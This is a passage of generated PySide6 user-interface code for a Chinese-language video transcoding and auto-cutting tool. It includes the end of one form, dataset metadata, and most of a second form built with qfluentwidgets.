self.pushBtn.setFlat(False) self.verticalLayout_3.addWidget(self.pushBtn) self.horizontalLayout_9.addWidget(self.frame_3) self.verticalLayout_5.addLayout(self.horizontalLayout_9) self.retranslateUi(Form) self.comboBox_5.currentTextChanged.connect(self.plainTextEdit.setPlainText) self.pushBtn.setDefault(True) QMetaObject.connectSlotsByName(Form) # setupUi def retranslateUi(self, Form): Form.setWindowTitle(QCoreApplication.translate("Form", u"Form", None)) self.Title1.setText(QCoreApplication.translate("Form", u"\u8f6c\u7801", None)) self.Title2.setText(QCoreApplication.translate("Form", u"\u6587\u4ef6", None)) self.Title3_1.setText(QCoreApplication.translate("Form", u"\u8f93\u5165", None)) self.fileBtn_1.setText(QCoreApplication.translate("Form", u"\u6d4f\u89c8", None)) self.Title3_4.setText(QCoreApplication.translate("Form", u"\u8f93\u51fa", None)) self.fileBtn_2.setText(QCoreApplication.translate("Form", u"\u6d4f\u89c8", None)) self.Title3_8.setText(QCoreApplication.translate("Form", u"\u5b57\u5e55", None)) self.fileBtn_4.setText(QCoreApplication.translate("Form", u"\u6d4f\u89c8", None)) self.Title3_7.setText(QCoreApplication.translate("Form", u"\u97f3\u9891", None)) self.fileBtn_3.setText(QCoreApplication.translate("Form", u"\u6d4f\u89c8", None)) self.Title2_2.setText(QCoreApplication.translate("Form", u"\u7f16\u7801\u8bbe\u7f6e", None)) self.Title2_3.setText(QCoreApplication.translate("Form", u"\u5207\u5272\u8bbe\u7f6e", None)) self.comboBox_5.setItemText(0, QCoreApplication.translate("Form", u"\u9ed8\u8ba4", None)) self.label_3.setText(QCoreApplication.translate("Form", u"\u97f3\u9891\u7f16\u7801\u5668", None)) self.label_5.setText(QCoreApplication.translate("Form", u"\u81ea\u5b9a\u4e49\u7f16\u7801", None)) self.checkBox_2.setText(QCoreApplication.translate("Form", u"\u5206\u8fa8\u7387", None)) self.label_6.setText(QCoreApplication.translate("Form", u"\u89c6\u9891\u7801\u7387kbps", None)) self.comboBox_2.setItemText(0, QCoreApplication.translate("Form", u"CRF\u54c1\u8d28-medium", None)) self.comboBox_2.setItemText(1, QCoreApplication.translate("Form", u"CRF\u54c1\u8d28-fast", None)) self.comboBox_2.setItemText(2, QCoreApplication.translate("Form", u"CBR\u5e73\u5747\u7801\u7387-medium", None)) self.comboBox_2.setItemText(3, QCoreApplication.translate("Form", u"CBR\u5e73\u5747\u7801\u7387-fast", None)) self.comboBox_2.setItemText(4, QCoreApplication.translate("Form", u"CQP\u786c\u7f16\u54c1\u8d28(*qsv)", None)) self.comboBox_3.setItemText(0, QCoreApplication.translate("Form", u"128k", None)) self.comboBox_3.setItemText(1, QCoreApplication.translate("Form", u"64k", None)) self.comboBox_3.setItemText(2, QCoreApplication.translate("Form", u"192k", None)) self.comboBox_3.setItemText(3, QCoreApplication.translate("Form", u"320k", None)) self.comboBox_3.setItemText(4, QCoreApplication.translate("Form", u"512k", None)) self.Title3_2.setText(QCoreApplication.translate("Form", u"\u89c6\u9891\u7f16\u7801\u5668", None)) self.label_7.setText(QCoreApplication.translate("Form", u"\u89c6\u9891\u54c1\u8d28", None)) self.lineEdit.setText(QCoreApplication.translate("Form", u"1920x1080", None)) self.lineEdit_2.setText(QCoreApplication.translate("Form", u"60", None)) self.label.setText(QCoreApplication.translate("Form", u"\u89c6\u9891\u7f16\u7801\u53c2\u6570", None)) self.checkBox_3.setText(QCoreApplication.translate("Form", u"\u5e27\u7387", None)) self.comboBox_4.setItemText(0, QCoreApplication.translate("Form", u"aac", None)) self.comboBox_4.setItemText(1, QCoreApplication.translate("Form", u"alac", None)) self.comboBox_4.setItemText(2, QCoreApplication.translate("Form", u"flac", None)) self.comboBox_4.setItemText(3, QCoreApplication.translate("Form", u"opus", None)) self.comboBox_4.setItemText(4, QCoreApplication.translate("Form", u"copy", None)) self.comboBox_4.setItemText(5, QCoreApplication.translate("Form", u"custom", None)) self.comboBox.setItemText(0, QCoreApplication.translate("Form", u"libx264", None)) self.comboBox.setItemText(1, QCoreApplication.translate("Form", u"h264_nvenc", None)) self.comboBox.setItemText(2, QCoreApplication.translate("Form", u"h264_qsv", None)) self.comboBox.setItemText(3, QCoreApplication.translate("Form", u"h264_amf", None)) self.comboBox.setItemText(4, QCoreApplication.translate("Form", u"copy", None)) self.comboBox.setItemText(5, QCoreApplication.translate("Form", u"custom", None)) self.label_4.setText(QCoreApplication.translate("Form", u"\u97f3\u9891\u7f16\u7801\u53c2\u6570", None)) self.checkBox.setText(QCoreApplication.translate("Form", u"\u4f7f\u7528\u9884\u8bbe", None)) self.plainTextEdit.setPlainText(QCoreApplication.translate("Form", u"-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k", None)) self.Title3_3.setText(QCoreApplication.translate("Form", u"\u7247\u5934\u65f6\u957f", None)) self.timeEdit.setDisplayFormat(QCoreApplication.translate("Form", u"H:mm:ss:zzz", None)) self.label_2.setText(QCoreApplication.translate("Form", u"\u7247\u5c3e\u65f6\u957f", None)) self.timeEdit_2.setDisplayFormat(QCoreApplication.translate("Form", u"H:mm:ss:zzz", None)) self.pushBtn.setText(QCoreApplication.translate("Form", u"\u5904\u7406\u89c6\u9891", None)) # retranslateUi
26,328
Python
.py
477
46.234801
146
0.69668
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,443
Ui_VautocutInterface.py
wish2333_VideoExtractAndConcat/modules/Ui_VautocutInterface.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'VautocutInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QAbstractScrollArea, QApplication, QCheckBox, QDoubleSpinBox, QFormLayout, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QLineEdit, QListWidgetItem, QPushButton, QRadioButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (ComboBox, EditableComboBox, ListWidget, PlainTextEdit, PrimaryPushButton, PushButton, ScrollArea) class Ui_VautocutInterface(object): def setupUi(self, VautocutInterface): if not VautocutInterface.objectName(): VautocutInterface.setObjectName(u"VautocutInterface") VautocutInterface.resize(1085, 749) VautocutInterface.setMinimumSize(QSize(780, 0)) self.verticalLayout = QVBoxLayout(VautocutInterface) self.verticalLayout.setObjectName(u"verticalLayout") self.VautocutscrollArea = ScrollArea(VautocutInterface) self.VautocutscrollArea.setObjectName(u"VautocutscrollArea") self.VautocutscrollArea.setMinimumSize(QSize(760, 0)) self.VautocutscrollArea.setFrameShape(QFrame.Shape.NoFrame) self.VautocutscrollArea.setFrameShadow(QFrame.Shadow.Sunken) self.VautocutscrollArea.setWidgetResizable(True) self.VautocutfacescrollAreaWidgetContents = QWidget() self.VautocutfacescrollAreaWidgetContents.setObjectName(u"VautocutfacescrollAreaWidgetContents") self.VautocutfacescrollAreaWidgetContents.setGeometry(QRect(0, 0, 1067, 731)) self.verticalLayout_3 = QVBoxLayout(self.VautocutfacescrollAreaWidgetContents) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.Vautocutbox01 = QHBoxLayout() self.Vautocutbox01.setSpacing(20) self.Vautocutbox01.setObjectName(u"Vautocutbox01") self.Vautocutbox01.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.VautocutverticalLayout_4 = QVBoxLayout() self.VautocutverticalLayout_4.setObjectName(u"VautocutverticalLayout_4") self.VautocutverticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.VautocutTitle1 = QLabel(self.VautocutfacescrollAreaWidgetContents) self.VautocutTitle1.setObjectName(u"VautocutTitle1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.VautocutTitle1.sizePolicy().hasHeightForWidth()) self.VautocutTitle1.setSizePolicy(sizePolicy) self.VautocutTitle1.setMaximumSize(QSize(150, 64)) font = QFont() font.setPointSize(28) font.setBold(True) font.setKerning(True) self.VautocutTitle1.setFont(font) self.VautocutverticalLayout_4.addWidget(self.VautocutTitle1) self.VautocutTitle2 = QLabel(self.VautocutfacescrollAreaWidgetContents) self.VautocutTitle2.setObjectName(u"VautocutTitle2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.VautocutTitle2.sizePolicy().hasHeightForWidth()) self.VautocutTitle2.setSizePolicy(sizePolicy1) self.VautocutTitle2.setMaximumSize(QSize(100, 45)) font1 = QFont() font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.VautocutTitle2.setFont(font1) self.VautocutverticalLayout_4.addWidget(self.VautocutTitle2) self.Vautocutbox01.addLayout(self.VautocutverticalLayout_4) self.Vautocutlabel = QLabel(self.VautocutfacescrollAreaWidgetContents) self.Vautocutlabel.setObjectName(u"Vautocutlabel") self.Vautocutlabel.setMaximumSize(QSize(16777215, 80)) self.Vautocutbox01.addWidget(self.Vautocutlabel) self.VautocuthorizontalSpacer = QSpacerItem(20, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.Vautocutbox01.addItem(self.VautocuthorizontalSpacer) self.VautocutpushBtn = PrimaryPushButton(self.VautocutfacescrollAreaWidgetContents) self.VautocutpushBtn.setObjectName(u"VautocutpushBtn") sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.VautocutpushBtn.sizePolicy().hasHeightForWidth()) self.VautocutpushBtn.setSizePolicy(sizePolicy2) self.VautocutpushBtn.setMinimumSize(QSize(240, 60)) font2 = QFont() font2.setPointSize(16) font2.setBold(True) font2.setKerning(True) self.VautocutpushBtn.setFont(font2) self.VautocutpushBtn.setFlat(False) self.Vautocutbox01.addWidget(self.VautocutpushBtn) self.VautocutSTBtn = QPushButton(self.VautocutfacescrollAreaWidgetContents) self.VautocutSTBtn.setObjectName(u"VautocutSTBtn") self.VautocutSTBtn.setMinimumSize(QSize(120, 60)) font3 = QFont() font3.setPointSize(16) font3.setBold(True) self.VautocutSTBtn.setFont(font3) self.Vautocutbox01.addWidget(self.VautocutSTBtn) self.VautocutpushBtn_2 = PushButton(self.VautocutfacescrollAreaWidgetContents) self.VautocutpushBtn_2.setObjectName(u"VautocutpushBtn_2") self.VautocutpushBtn_2.setMinimumSize(QSize(80, 60)) self.VautocutpushBtn_2.setFont(font3) self.Vautocutbox01.addWidget(self.VautocutpushBtn_2) self.verticalLayout_3.addLayout(self.Vautocutbox01) self.Vautocutbox02 = QFrame(self.VautocutfacescrollAreaWidgetContents) self.Vautocutbox02.setObjectName(u"Vautocutbox02") self.Vautocutbox02.setEnabled(True) sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.Vautocutbox02.sizePolicy().hasHeightForWidth()) self.Vautocutbox02.setSizePolicy(sizePolicy3) self.Vautocutbox02.setMinimumSize(QSize(480, 145)) self.Vautocutbox02.setMaximumSize(QSize(16777215, 240)) self.Vautocutbox02.setFrameShape(QFrame.Shape.StyledPanel) self.Vautocutbox02.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout = QGridLayout(self.Vautocutbox02) self.gridLayout.setObjectName(u"gridLayout") self.Vautocutinputfile = PushButton(self.Vautocutbox02) self.Vautocutinputfile.setObjectName(u"Vautocutinputfile") font4 = QFont() font4.setPointSize(12) font4.setBold(True) self.Vautocutinputfile.setFont(font4) self.gridLayout.addWidget(self.Vautocutinputfile, 0, 0, 1, 1) self.Vautocutinputclear = PushButton(self.Vautocutbox02) self.Vautocutinputclear.setObjectName(u"Vautocutinputclear") self.Vautocutinputclear.setFont(font4) self.gridLayout.addWidget(self.Vautocutinputclear, 0, 1, 1, 1) self.Vautocutoutputfolder = QPushButton(self.Vautocutbox02) self.Vautocutoutputfolder.setObjectName(u"Vautocutoutputfolder") self.Vautocutoutputfolder.setFont(font4) self.gridLayout.addWidget(self.Vautocutoutputfolder, 0, 2, 1, 1) self.Vautocutinputlist = ListWidget(self.Vautocutbox02) self.Vautocutinputlist.setObjectName(u"Vautocutinputlist") sizePolicy4 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Preferred) sizePolicy4.setHorizontalStretch(0) sizePolicy4.setVerticalStretch(0) sizePolicy4.setHeightForWidth(self.Vautocutinputlist.sizePolicy().hasHeightForWidth()) self.Vautocutinputlist.setSizePolicy(sizePolicy4) self.Vautocutinputlist.setMinimumSize(QSize(0, 120)) self.Vautocutinputlist.setMaximumSize(QSize(16777215, 200)) self.Vautocutinputlist.setAcceptDrops(True) self.Vautocutinputlist.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOn) self.Vautocutinputlist.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded) self.Vautocutinputlist.setSizeAdjustPolicy(QAbstractScrollArea.SizeAdjustPolicy.AdjustIgnored) self.Vautocutinputlist.setDragEnabled(False) self.gridLayout.addWidget(self.Vautocutinputlist, 1, 0, 1, 3) self.verticalLayout_3.addWidget(self.Vautocutbox02) self.Vautocutbox03 = QHBoxLayout() self.Vautocutbox03.setObjectName(u"Vautocutbox03") self.VautocutTitle2_3 = QLabel(self.VautocutfacescrollAreaWidgetContents) self.VautocutTitle2_3.setObjectName(u"VautocutTitle2_3") sizePolicy5 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Maximum) sizePolicy5.setHorizontalStretch(0) sizePolicy5.setVerticalStretch(0) sizePolicy5.setHeightForWidth(self.VautocutTitle2_3.sizePolicy().hasHeightForWidth()) self.VautocutTitle2_3.setSizePolicy(sizePolicy5) self.VautocutTitle2_3.setMinimumSize(QSize(240, 45)) self.VautocutTitle2_3.setMaximumSize(QSize(600, 16777215)) self.VautocutTitle2_3.setFont(font1) self.Vautocutbox03.addWidget(self.VautocutTitle2_3) self.VautocutTitle2_2 = QLabel(self.VautocutfacescrollAreaWidgetContents) self.VautocutTitle2_2.setObjectName(u"VautocutTitle2_2") sizePolicy6 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Minimum) sizePolicy6.setHorizontalStretch(0) sizePolicy6.setVerticalStretch(0) sizePolicy6.setHeightForWidth(self.VautocutTitle2_2.sizePolicy().hasHeightForWidth()) self.VautocutTitle2_2.setSizePolicy(sizePolicy6) self.VautocutTitle2_2.setMinimumSize(QSize(60, 45)) self.VautocutTitle2_2.setMaximumSize(QSize(240, 45)) self.VautocutTitle2_2.setFont(font1) self.Vautocutbox03.addWidget(self.VautocutTitle2_2) self.verticalLayout_3.addLayout(self.Vautocutbox03) self.Vautocutbox04 = QHBoxLayout() self.Vautocutbox04.setObjectName(u"Vautocutbox04") self.Vautocutframe_2 = QFrame(self.VautocutfacescrollAreaWidgetContents) self.Vautocutframe_2.setObjectName(u"Vautocutframe_2") sizePolicy6.setHeightForWidth(self.Vautocutframe_2.sizePolicy().hasHeightForWidth()) self.Vautocutframe_2.setSizePolicy(sizePolicy6) self.Vautocutframe_2.setMinimumSize(QSize(600, 360)) self.Vautocutframe_2.setMaximumSize(QSize(600, 360)) self.Vautocutframe_2.setFrameShape(QFrame.Shape.StyledPanel) self.Vautocutframe_2.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout_2 = QVBoxLayout(self.Vautocutframe_2) self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.VautocutgridLayout = QGridLayout() self.VautocutgridLayout.setObjectName(u"VautocutgridLayout") self.VautocutgridLayout.setHorizontalSpacing(24) self.VautocutgridLayout.setVerticalSpacing(16) self.VautocutlineEditVE = EditableComboBox(self.Vautocutframe_2) self.VautocutlineEditVE.setObjectName(u"VautocutlineEditVE") self.VautocutlineEditVE.setMinimumSize(QSize(0, 30)) font5 = QFont() font5.setPointSize(12) self.VautocutlineEditVE.setFont(font5) self.VautocutlineEditVE.setReadOnly(False) self.VautocutgridLayout.addWidget(self.VautocutlineEditVE, 0, 1, 1, 1) self.Vautocutlabel_4 = QLabel(self.Vautocutframe_2) self.Vautocutlabel_4.setObjectName(u"Vautocutlabel_4") font6 = QFont() font6.setPointSize(12) font6.setBold(True) font6.setKerning(True) self.Vautocutlabel_4.setFont(font6) self.VautocutgridLayout.addWidget(self.Vautocutlabel_4, 1, 2, 1, 1) self.VautocutradioButton_3 = QRadioButton(self.Vautocutframe_2) self.VautocutradioButton_3.setObjectName(u"VautocutradioButton_3") self.VautocutgridLayout.addWidget(self.VautocutradioButton_3, 3, 2, 1, 1) self.VautocutradioButton = QRadioButton(self.Vautocutframe_2) self.VautocutradioButton.setObjectName(u"VautocutradioButton") self.VautocutgridLayout.addWidget(self.VautocutradioButton, 3, 0, 1, 1) self.Vautocutlabel_2 = QLabel(self.Vautocutframe_2) self.Vautocutlabel_2.setObjectName(u"Vautocutlabel_2") self.Vautocutlabel_2.setFont(font6) self.VautocutgridLayout.addWidget(self.Vautocutlabel_2, 0, 2, 1, 1) self.VautocutradioButton_4 = QRadioButton(self.Vautocutframe_2) self.VautocutradioButton_4.setObjectName(u"VautocutradioButton_4") self.VautocutgridLayout.addWidget(self.VautocutradioButton_4, 3, 3, 1, 1) self.VautocutradioButton_2 = QRadioButton(self.Vautocutframe_2) self.VautocutradioButton_2.setObjectName(u"VautocutradioButton_2") self.VautocutgridLayout.addWidget(self.VautocutradioButton_2, 3, 1, 1, 1) self.Vautocutlabel_3 = QLabel(self.Vautocutframe_2) self.Vautocutlabel_3.setObjectName(u"Vautocutlabel_3") self.Vautocutlabel_3.setFont(font6) self.VautocutgridLayout.addWidget(self.Vautocutlabel_3, 1, 0, 1, 1) self.VcodecpIFplainTextEdit = PlainTextEdit(self.Vautocutframe_2) self.VcodecpIFplainTextEdit.setObjectName(u"VcodecpIFplainTextEdit") self.VcodecpIFplainTextEdit.setFont(font5) self.VautocutgridLayout.addWidget(self.VcodecpIFplainTextEdit, 5, 1, 1, 3) self.VautocutTitle3_2 = QLabel(self.Vautocutframe_2) self.VautocutTitle3_2.setObjectName(u"VautocutTitle3_2") self.VautocutTitle3_2.setFont(font6) self.VautocutgridLayout.addWidget(self.VautocutTitle3_2, 0, 0, 1, 1) self.VautocutcomboBox_3 = ComboBox(self.Vautocutframe_2) self.VautocutcomboBox_3.addItem("") self.VautocutcomboBox_3.addItem("") self.VautocutcomboBox_3.addItem("") self.VautocutcomboBox_3.addItem("") self.VautocutcomboBox_3.addItem("") self.VautocutcomboBox_3.addItem("") self.VautocutcomboBox_3.setObjectName(u"VautocutcomboBox_3") sizePolicy3.setHeightForWidth(self.VautocutcomboBox_3.sizePolicy().hasHeightForWidth()) self.VautocutcomboBox_3.setSizePolicy(sizePolicy3) self.VautocutcomboBox_3.setMinimumSize(QSize(0, 30)) font7 = QFont() font7.setPointSize(12) font7.setKerning(True) self.VautocutcomboBox_3.setFont(font7) self.VautocutgridLayout.addWidget(self.VautocutcomboBox_3, 1, 3, 1, 1) self.Vautocutlabel_5 = QLabel(self.Vautocutframe_2) self.Vautocutlabel_5.setObjectName(u"Vautocutlabel_5") self.Vautocutlabel_5.setFont(font2) self.VautocutgridLayout.addWidget(self.Vautocutlabel_5, 5, 0, 1, 1) self.VautocutlineEditAE = EditableComboBox(self.Vautocutframe_2) self.VautocutlineEditAE.setObjectName(u"VautocutlineEditAE") self.VautocutlineEditAE.setMinimumSize(QSize(0, 30)) self.VautocutlineEditAE.setFont(font5) self.VautocutlineEditAE.setReadOnly(False) self.VautocutgridLayout.addWidget(self.VautocutlineEditAE, 1, 1, 1, 1) self.VautocutlineEdit = EditableComboBox(self.Vautocutframe_2) self.VautocutlineEdit.setObjectName(u"VautocutlineEdit") self.VautocutlineEdit.setFont(font5) self.VautocutgridLayout.addWidget(self.VautocutlineEdit, 0, 3, 1, 1) self.VautocutcheckBox = QCheckBox(self.Vautocutframe_2) self.VautocutcheckBox.setObjectName(u"VautocutcheckBox") self.VautocutgridLayout.addWidget(self.VautocutcheckBox, 2, 0, 1, 1) self.VautocutradioButton_5 = QRadioButton(self.Vautocutframe_2) self.VautocutradioButton_5.setObjectName(u"VautocutradioButton_5") self.VautocutgridLayout.addWidget(self.VautocutradioButton_5, 2, 1, 1, 1) self.VautocutradioButton_11 = QRadioButton(self.Vautocutframe_2) self.VautocutradioButton_11.setObjectName(u"VautocutradioButton_11") self.VautocutgridLayout.addWidget(self.VautocutradioButton_11, 2, 2, 1, 1) self.VautocutcheckBox_2 = QCheckBox(self.Vautocutframe_2) self.VautocutcheckBox_2.setObjectName(u"VautocutcheckBox_2") self.VautocutgridLayout.addWidget(self.VautocutcheckBox_2, 2, 3, 1, 1) self.verticalLayout_2.addLayout(self.VautocutgridLayout) self.Vautocutbox04.addWidget(self.Vautocutframe_2) self.Vautocutframe_3 = QFrame(self.VautocutfacescrollAreaWidgetContents) self.Vautocutframe_3.setObjectName(u"Vautocutframe_3") sizePolicy6.setHeightForWidth(self.Vautocutframe_3.sizePolicy().hasHeightForWidth()) self.Vautocutframe_3.setSizePolicy(sizePolicy6) self.Vautocutframe_3.setMinimumSize(QSize(280, 360)) self.Vautocutframe_3.setMaximumSize(QSize(480, 360)) self.Vautocutframe_3.setFrameShape(QFrame.Shape.StyledPanel) self.Vautocutframe_3.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout_3 = QGridLayout(self.Vautocutframe_3) self.gridLayout_3.setObjectName(u"gridLayout_3") self.VautocutdoubleSpinBox = QDoubleSpinBox(self.Vautocutframe_3) self.VautocutdoubleSpinBox.setObjectName(u"VautocutdoubleSpinBox") self.VautocutdoubleSpinBox.setFont(font5) self.VautocutdoubleSpinBox.setDecimals(2) self.VautocutdoubleSpinBox.setMaximum(99.000000000000000) self.VautocutdoubleSpinBox.setSingleStep(0.050000000000000) self.gridLayout_3.addWidget(self.VautocutdoubleSpinBox, 0, 1, 1, 1) self.VautocutdoubleSpinBox_4 = QDoubleSpinBox(self.Vautocutframe_3) self.VautocutdoubleSpinBox_4.setObjectName(u"VautocutdoubleSpinBox_4") self.VautocutdoubleSpinBox_4.setFont(font5) self.VautocutdoubleSpinBox_4.setSingleStep(0.050000000000000) self.gridLayout_3.addWidget(self.VautocutdoubleSpinBox_4, 1, 1, 1, 1) self.Vautocutlabel_9 = QLabel(self.Vautocutframe_3) self.Vautocutlabel_9.setObjectName(u"Vautocutlabel_9") self.Vautocutlabel_9.setMaximumSize(QSize(120, 16777215)) self.Vautocutlabel_9.setFont(font5) self.gridLayout_3.addWidget(self.Vautocutlabel_9, 2, 0, 1, 1) self.Vautocutframe = QFrame(self.Vautocutframe_3) self.Vautocutframe.setObjectName(u"Vautocutframe") self.Vautocutframe.setMaximumSize(QSize(16777215, 160)) self.Vautocutframe.setFrameShape(QFrame.Shape.StyledPanel) self.Vautocutframe.setFrameShadow(QFrame.Shadow.Raised) self.formLayout = QFormLayout(self.Vautocutframe) self.formLayout.setObjectName(u"formLayout") self.Vautocutlabel_7 = QLabel(self.Vautocutframe) self.Vautocutlabel_7.setObjectName(u"Vautocutlabel_7") self.Vautocutlabel_7.setMaximumSize(QSize(16777215, 30)) self.Vautocutlabel_7.setFont(font4) self.formLayout.setWidget(0, QFormLayout.LabelRole, self.Vautocutlabel_7) self.VautocutradioButton_6 = QRadioButton(self.Vautocutframe) self.VautocutradioButton_6.setObjectName(u"VautocutradioButton_6") font8 = QFont() font8.setPointSize(10) self.VautocutradioButton_6.setFont(font8) self.formLayout.setWidget(1, QFormLayout.LabelRole, self.VautocutradioButton_6) self.VautocutradioButton_7 = QRadioButton(self.Vautocutframe) self.VautocutradioButton_7.setObjectName(u"VautocutradioButton_7") self.VautocutradioButton_7.setFont(font8) self.formLayout.setWidget(2, QFormLayout.LabelRole, self.VautocutradioButton_7) self.VautocutradioButton_8 = QRadioButton(self.Vautocutframe) self.VautocutradioButton_8.setObjectName(u"VautocutradioButton_8") self.VautocutradioButton_8.setFont(font8) self.formLayout.setWidget(3, QFormLayout.LabelRole, self.VautocutradioButton_8) self.VautocutradioButton_9 = QRadioButton(self.Vautocutframe) self.VautocutradioButton_9.setObjectName(u"VautocutradioButton_9") self.VautocutradioButton_9.setFont(font8) self.formLayout.setWidget(4, QFormLayout.LabelRole, self.VautocutradioButton_9) self.VautocutradioButton_10 = QRadioButton(self.Vautocutframe) self.VautocutradioButton_10.setObjectName(u"VautocutradioButton_10") self.VautocutradioButton_10.setFont(font8) self.formLayout.setWidget(5, QFormLayout.LabelRole, self.VautocutradioButton_10) self.VautocutlineEdit_2 = QLineEdit(self.Vautocutframe) self.VautocutlineEdit_2.setObjectName(u"VautocutlineEdit_2") self.VautocutlineEdit_2.setMaximumSize(QSize(240, 16777215)) self.formLayout.setWidget(1, QFormLayout.FieldRole, self.VautocutlineEdit_2) self.VautocutlineEdit_3 = QLineEdit(self.Vautocutframe) self.VautocutlineEdit_3.setObjectName(u"VautocutlineEdit_3") self.VautocutlineEdit_3.setMaximumSize(QSize(240, 16777215)) self.formLayout.setWidget(2, QFormLayout.FieldRole, self.VautocutlineEdit_3) self.VautocutlineEdit_4 = QLineEdit(self.Vautocutframe) self.VautocutlineEdit_4.setObjectName(u"VautocutlineEdit_4") self.formLayout.setWidget(3, QFormLayout.FieldRole, self.VautocutlineEdit_4) self.gridLayout_3.addWidget(self.Vautocutframe, 5, 0, 1, 2) self.Vautocutlabel_11 = QLabel(self.Vautocutframe_3) self.Vautocutlabel_11.setObjectName(u"Vautocutlabel_11") self.Vautocutlabel_11.setMaximumSize(QSize(120, 16777215)) self.Vautocutlabel_11.setFont(font5) self.gridLayout_3.addWidget(self.Vautocutlabel_11, 1, 0, 1, 1) self.VautocutdoubleSpinBox_3 = QDoubleSpinBox(self.Vautocutframe_3) self.VautocutdoubleSpinBox_3.setObjectName(u"VautocutdoubleSpinBox_3") self.VautocutdoubleSpinBox_3.setFont(font5) self.VautocutdoubleSpinBox_3.setMaximum(9999.000000000000000) self.VautocutdoubleSpinBox_3.setSingleStep(0.050000000000000) self.gridLayout_3.addWidget(self.VautocutdoubleSpinBox_3, 3, 1, 1, 1) self.Vautocutlabel_8 = QLabel(self.Vautocutframe_3) self.Vautocutlabel_8.setObjectName(u"Vautocutlabel_8") self.Vautocutlabel_8.setMaximumSize(QSize(120, 16777215)) self.Vautocutlabel_8.setFont(font5) self.gridLayout_3.addWidget(self.Vautocutlabel_8, 0, 0, 1, 1) self.Vautocutlabel_10 = QLabel(self.Vautocutframe_3) self.Vautocutlabel_10.setObjectName(u"Vautocutlabel_10") self.Vautocutlabel_10.setMaximumSize(QSize(120, 16777215)) self.Vautocutlabel_10.setFont(font5) self.gridLayout_3.addWidget(self.Vautocutlabel_10, 3, 0, 1, 1) self.VautocutdoubleSpinBox_2 = QDoubleSpinBox(self.Vautocutframe_3) self.VautocutdoubleSpinBox_2.setObjectName(u"VautocutdoubleSpinBox_2") self.VautocutdoubleSpinBox_2.setFont(font5) self.VautocutdoubleSpinBox_2.setMaximum(9999.000000000000000) self.VautocutdoubleSpinBox_2.setSingleStep(0.050000000000000) self.gridLayout_3.addWidget(self.VautocutdoubleSpinBox_2, 2, 1, 1, 1) self.Vautocutlabel_6 = QLabel(self.Vautocutframe_3) self.Vautocutlabel_6.setObjectName(u"Vautocutlabel_6") self.Vautocutlabel_6.setMaximumSize(QSize(120, 16777215)) self.Vautocutlabel_6.setFont(font5) self.gridLayout_3.addWidget(self.Vautocutlabel_6, 4, 0, 1, 1) self.VautocutdoubleSpinBox_5 = QDoubleSpinBox(self.Vautocutframe_3) self.VautocutdoubleSpinBox_5.setObjectName(u"VautocutdoubleSpinBox_5") self.VautocutdoubleSpinBox_5.setFont(font5) self.VautocutdoubleSpinBox_5.setMinimum(0.500000000000000) self.VautocutdoubleSpinBox_5.setMaximum(2.000000000000000) self.VautocutdoubleSpinBox_5.setSingleStep(0.050000000000000) self.VautocutdoubleSpinBox_5.setValue(1.000000000000000) self.gridLayout_3.addWidget(self.VautocutdoubleSpinBox_5, 4, 1, 1, 1) self.Vautocutbox04.addWidget(self.Vautocutframe_3) self.verticalLayout_3.addLayout(self.Vautocutbox04) self.VautocutscrollArea.setWidget(self.VautocutfacescrollAreaWidgetContents) self.verticalLayout.addWidget(self.VautocutscrollArea) self.retranslateUi(VautocutInterface) self.VautocutpushBtn.setDefault(True) QMetaObject.connectSlotsByName(VautocutInterface) # setupUi def retranslateUi(self, VautocutInterface): VautocutInterface.setWindowTitle(QCoreApplication.translate("VautocutInterface", u"Form", None)) self.VautocutTitle1.setText(QCoreApplication.translate("VautocutInterface", u"\u81ea\u52a8\u526a\u8f91", None)) self.VautocutTitle2.setText(QCoreApplication.translate("VautocutInterface", u"\u89c6\u9891", None)) self.Vautocutlabel.setText(QCoreApplication.translate("VautocutInterface", u"\u57fa\u4e8eauto-editor\u7684\u81ea\u52a8\u526a\u8f91", None)) self.VautocutpushBtn.setText(QCoreApplication.translate("VautocutInterface", 